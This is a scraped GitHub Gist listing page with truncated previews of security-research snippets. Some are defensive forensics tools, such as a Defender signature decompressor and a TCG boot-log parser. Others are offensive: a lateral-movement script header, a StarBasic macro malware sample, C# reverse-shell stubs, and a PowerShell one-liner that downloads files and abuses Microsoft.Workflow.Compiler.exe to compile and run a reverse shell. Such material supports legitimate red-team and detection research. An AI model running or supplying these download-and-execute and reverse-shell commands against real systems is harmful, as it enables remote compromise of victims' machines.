Skip to content

Instantly share code, notes, and snippets.

Listening to meowzek

Dan danzek

Listening to meowzek
Block or report user

Report or block danzek

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
mattifestation / ExpandDefenderSig.ps1
Created Mar 28, 2019
Decompresses Windows Defender AV signatures for exploration purposes
View ExpandDefenderSig.ps1
filter Expand-DefenderAVSignatureDB {
Decompresses a Windows Defender AV signature database (.VDM file).
Expand-DefenderAVSignatureDB extracts a Windows Defender AV signature database (.VDM file). This function was developed by reversing mpengine.dll and with the help of Tavis Ormandy and his LoadLibrary project ( Note: Currently, "scrambled" databases are not supported although, I have yet to encounter a scrambled database. Thus far, all databases I've encountered are zlib-compressed.
View Invoke-AccessXSLT.ps1
Lateral Movement Via MSACCESS TransformXML
Author: Philip Tsukerman (@PhilipTsukerman)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
function Invoke-AccessXSLT {
mattifestation / SimpleTCGLogParser.ps1
Last active Apr 14, 2019
If you have the HgsDiagnostics PowerShell module, then you can parse TCG logs.
View SimpleTCGLogParser.ps1
Import-Module HgsDiagnostics
$GetHgsTrace = Get-Command Get-HgsTrace
$RemoteAttestationCoreReference = $GetHgsTrace.ImplementingType.Assembly.GetReferencedAssemblies() | Where-Object { $_.Name -eq 'Microsoft.Windows.RemoteAttestation.Core' }
Add-Type -AssemblyName $RemoteAttestationCoreReference.FullName
$MostRecentTCGLog = Get-ChildItem C:\Windows\Logs\MeasuredBoot | Sort-Object -Property LastWriteTime -Descending | Select-Object -First 1 | Select-Object -ExpandProperty FullName
$LogBytes = [IO.File]::ReadAllBytes($MostRecentTCGLog)
$ParsedTCGLog = [Microsoft.Windows.RemoteAttestation.Core.TcgEventLog]::Parse($LogBytes)
$ParsedTCGLog.TcgData.Children | Sort-Object -Property PcrIndex | Group-Object -Property PcrIndex
sf-jonstewart /
Last active Feb 21, 2019
Stroz Friedberg developer Shane McCulley rewrote our Python scripts for parsing Windows shell items using Kaitai. We'll contribute the definitions to Kaitai as open source. shows how to construct a parser on top of the Kaitai-generated parsers. This is an unsupported pre-release. Feedback welcome!
import datetime
from typing import AnyStr, Generator, Optional, Tuple, Type, Union
import uuid
from kaitaistruct import BytesIO, KaitaiStream
import known_uuids
import logging
import ShellItemList
JohnLaTwC / star basic macro malware.txt
Created Feb 7, 2019
StarBasic macro Malware (Uploaded by @JohnLaTwC)
View star basic macro malware.txt
## Uploaded by @JohnLaTwC
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE script:module PUBLIC "-// OfficeDocument 1.0//EN" "module.dtd">
<script:module xmlns:script="" script:name="Module1" script:language="StarBasic">REM ***** BASIC *****
Sub OnLoad
Dim os as string
#!/usr/bin/env python3
import os
from time import sleep
FILE_PATH = 'ts.txt'
def get_atime_1():
result = os.stat(FILE_PATH, follow_symlinks = False)
return result.st_atime
View abandonedInprocServer32.cs
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Management;
namespace ComAbandonment
public class ComAbandonment
BankSecurity / Simple_Rev_Shell.cs
Last active Sep 17, 2019
C# Simple Reverse Shell Code
View Simple_Rev_Shell.cs
using System;
using System.Text;
using System.IO;
using System.Diagnostics;
using System.ComponentModel;
using System.Linq;
using System.Net;
using System.Net.Sockets;
BankSecurity / PowerShell_Command.txt
Created Oct 1, 2018
Reverse Shell Powershell command Abusing Microsoft.Workflow.Compiler.exe
View PowerShell_Command.txt
powershell -command "& { (New-Object Net.WebClient).DownloadFile('', '.\REV.txt') }" && powershell -command "& { (New-Object Net.WebClient).DownloadFile('', '.\Rev.Shell') }" && C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt Rev.Shell
powershell -command "& { (New-Object Net.WebClient).DownloadFile('', '.\REV.txt') }" && powershell -command "& { (New-Object Net.WebClient).DownloadFile('', '.\Rev.Shell') }" && C:\Windows\Microsof
BankSecurity / Rev.Shell
Created Oct 1, 2018
Abuse Microsoft.Workflow.Compiler.exe for compile C# Reverse Shell
View Rev.Shell
using System;
using System.Text;
using System.IO;
using System.Diagnostics;
using System.ComponentModel;
using System.Net;
using System.Net.Sockets;
using System.Workflow.Activities;
public class Program : SequentialWorkflowActivity
You can’t perform that action at this time.